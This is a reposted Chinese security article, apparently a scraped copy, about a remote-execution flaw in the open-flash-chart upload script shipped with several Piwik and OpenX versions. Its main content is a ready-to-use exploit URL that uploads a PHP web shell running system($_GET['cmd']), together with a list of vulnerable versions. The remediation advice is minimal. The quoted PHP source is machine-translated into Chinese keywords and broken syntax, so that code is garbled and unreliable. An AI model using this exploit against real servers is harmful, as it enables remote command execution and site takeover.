Piwik和OpenX多版本存在PHP远程履行漏洞及修复[网络技术]
本文“Piwik和OpenX多版本存在PHP远程履行漏洞及修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
本地测试成功
解析代码:
<?PHP的
/ *这个暂时文件,我们将上传的图象文件保存默许途径* /
$ default_path ='.. / tmp目录,上传,图象/';
/ *查抄能否存在$ default_path变量* /
假如(!file_exists($ default_path))
/ *假如属实,使具有写入权限的目录* /
mkdir($ default_path,0777,真实);
/ *然后,成立在与上面的文件名称的目录从情势输入“名称”*文件/
/ *这个变量的状况并没有删除后再利用* /
$目的地= $ default_path.的basename($ _GET这个['名称']);
保存您的图象: '. $destination;
/ *恶意代码在这里,并且攻击者能履行这个代码* /
$jfh = fopen ($destination, ‘w’)或(“不能翻开文件”);
fwrite($ jfh,$ HTTP_RAW_POST_DATA变量);
fclose($ jfh);
?>
EXP:http://www.hackqing.cn/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>
测试通过的版本 测试成功
Piwik 0.4.3
Piwik 0.4.2
Piwik 0.4.1
Piwik 0.4
Piwik 0.2.37
Piwik 0.2.36
Piwik 0.2.35
OpenX 2.8.2
OpenX 2.8.6
OpenX 2.8.5
OpenX 2.8.4
OpenX 2.8.3
修复筹划:
关注官方网站及时修复
以上是“Piwik和OpenX多版本存在PHP远程履行漏洞及修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |